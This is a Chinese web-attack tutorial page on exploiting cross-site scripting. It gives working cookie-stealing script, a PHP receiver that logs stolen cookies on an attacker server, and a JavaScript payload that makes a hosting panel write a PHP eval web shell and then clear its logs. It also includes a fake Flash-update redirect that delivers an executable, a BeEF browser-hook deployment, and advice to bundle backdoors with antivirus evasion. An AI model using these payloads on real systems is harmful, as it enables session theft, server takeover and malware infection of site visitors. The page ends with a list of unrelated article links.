当前位置: 首页 > news >正文

Web攻防-XSS跨站Cookie盗取数据包提交网络钓鱼BEEF项目XSS平台危害利用

知识点:
1、Web攻防-XSS跨站-手工代码&框架工具&在线平台
2、Web攻防-XSS跨站-Cookie盗取&数据提交&网络钓鱼

演示案例-WEB攻防-XSS跨站-Cookie盗取&数据提交&网络钓鱼&Beef工具

1、XSS跨站-攻击利用-凭据盗取

条件:无防护Cookie凭据获取
利用:XSS平台或手写接受代码
演示:某贷款分配系统存储XSS利用

在这里插入图片描述
在这里插入图片描述
在这里插入图片描述
在这里插入图片描述
在这里插入图片描述
在这里插入图片描述

手工

目标上插入的XSS:
<script>var url='http://xx.xx.xx.xx/getcookie.php?u='+window.location.href+'&c='+document.cookie;document.write("<img src="+url+" />");</script>

在这里插入图片描述
在这里插入图片描述

攻击者服务器上接受脚本getcookie.php:
<?php
$url=$_GET['u'];
$cookie=$_GET['c'];
$fp = fopen('cookie.txt',"a");
fwrite($fp,$url."|".$cookie."\n");
fclose($fp);
?>

在这里插入图片描述
在这里插入图片描述
在这里插入图片描述
在这里插入图片描述
在这里插入图片描述
在这里插入图片描述

平台:XSSReceiver

简单配置即可使用,无需数据库,无需其他组件支持
搭建:https://github.com/epoch99/BlueLotus_XSSReceiver-master
在这里插入图片描述
在这里插入图片描述
在这里插入图片描述
在这里插入图片描述
在这里插入图片描述
在这里插入图片描述
在这里插入图片描述
在这里插入图片描述
在这里插入图片描述
在这里插入图片描述
在这里插入图片描述
在这里插入图片描述

2、XSS跨站-攻击利用-数据提交

条件:熟悉后台业务功能数据包,利用JS写一个模拟提交
利用:凭据获取不到或有防护无法利用凭据进入时考虑
演示:小皮面板系统存储XSS提交数据包模拟写入后门文件
参考:blog.csdn.net/RestoreJustice/article/details/129735449

攻击者知道目标网站使用了什么源码,就可以自己本地部署一套同样的源码,在登录本地后台对后台一些业务功能(例如用户创建等)进行操作并截取其数据包,利用JS写一个模拟提交,当目标执行这个js就会执行攻击者想要的操作(用户创建等)
在这里插入图片描述
在这里插入图片描述
在这里插入图片描述
在这里插入图片描述

攻击者服务器上创建poc1.js,内容为:
function poc(){
$.get('/service/app/tasks.php?type=task_list',{},function(data){var id=data.data[0].ID;
$.post('/service/app/tasks.php?type=exec_task',{
tid:id},function(res2){
$.post('/service/app/log.php?type=clearlog',{},function(res3){},"json");},"json");},"json");
}
function save(){var data=new Object();
data.task_id="";
data.title="test";
data.exec_cycle="1";
data.week="1";
data.day="3";
data.hour="14";
data.minute = "20";
data.shell='echo "<?php @eval($_POST[123]);?>" >C:/xp.cn/www/wwwroot/admin/localhost_80/wwwroot/1.php';
$.post('/service/app/tasks.php?type=save_shell',data,function(res){poc();},'json');
}
save();

在这里插入图片描述

 XSS攻击代码:<script src="http://xx.xxx.xxx/poc1.js"></script>

在这里插入图片描述
在这里插入图片描述
在这里插入图片描述

3、XSS跨站-攻击利用-网络钓鱼

项目:https://github.com/r00tSe7en/Fake-flash.cn
在这里插入图片描述

1、将后门及正常文件捆绑打包免杀(实战情况下必须要做的部分)

2、部署可访问的钓鱼页面并修改(可以用项目也可以自己手动生成)

在这里插入图片描述
在这里插入图片描述
在这里插入图片描述
在这里插入图片描述
在这里插入图片描述

3、植入XSS代码等待受害者触发

<script>alert('当前浏览器Flash版本过低,请下载升级!');location.href='http://x.x.x.x/flash.exe'</script>//这里是直接提供了exe下载地址而没有经过钓鱼页面,如果需要经过钓鱼页面再下载exe就是不用指定flash.exe即可location.href='http://x.x.x.x/flash.exe'</script>改为location.href='http://x.x.x.x/'</script>

在这里插入图片描述
在这里插入图片描述
在这里插入图片描述
在这里插入图片描述
在这里插入图片描述

4、XSS跨站-攻击利用-浏览器控制框架-beef-xss

只需执行JS文件,即可实现对当前浏览器的控制,可配合各类手法利用
演示:阿里云 Ubuntu 16.04 x64(按量计费) HK香港服务器
apt update
apt install docker
apt install docker-compose
搭建:docker run --rm -p 3000:3000 janes/beef
访问:http://ip:3000/ui/panel (账号密码:beef/beef)

在这里插入图片描述

在这里插入图片描述
在这里插入图片描述

利用:<script src="http://ip:3000/hook.js"></script>

在这里插入图片描述
在这里插入图片描述

在这里插入图片描述
在这里插入图片描述
在这里插入图片描述

http://www.lqws.cn/news/466363.html

相关文章:

  • 广州华锐互动:以技术创新引领虚拟现实体验新高度
  • 私有规则库:企业合规与安全的终极防线
  • Go 语言 GMP 调度模型解析
  • 从流量为王到留量为王:开源链动2+1模式、AI智能名片与S2B2C商城小程序的协同创新路径
  • 推客小程序系统开发全攻略:构建社交电商新生态
  • 亚马逊认证考试系列 - 第一部份:基础服务 - AWS SAA C03
  • Maven-添加子模块
  • SylixOS 下的消息队列
  • SQLite 数据库操作完整指南
  • 逆向入门(14、15)程序逆向篇-Brad Soblesky.1-fty_crkme3
  • AWS-SAA 第二部份:安全性和权限管理
  • 操作系统进程与线程核心知识全览
  • Softhub软件下载站实战开发(六):软件配置面板实现
  • LeetCode 1432.改变一个整数能得到的最大差值:暴力模拟/贪心
  • 企业公用电脑登录安全管控的终极方案:ASP操作系统安全登录管控方案
  • c++ 虚继承
  • 【软考高级系统架构论文】论云上自动化运维及其应用
  • 嵌入式开发之嵌入式系统架构如何搭建?
  • Spring与SLF4J/Logback日志框架深度解析:从源码看日志系统设计
  • elasticsearch安装ik分词器
  • 3.1 Android NDK交叉编译FFmpeg
  • 领域驱动设计(DDD)【3】之事件风暴
  • React 重识
  • Seata模式
  • Spring AOP全面详讲
  • 从 Elasticsearch 集群中移除一个节点
  • `customRef` 在实战中的使用:防抖、计算属性缓存和异步数据获取
  • 腾讯云IM即时通讯:开启实时通信新时代
  • nuxt3 + vue3 分片上传组件全解析(支持大文件+断点续传)
  • RabbitMQ 的工作流程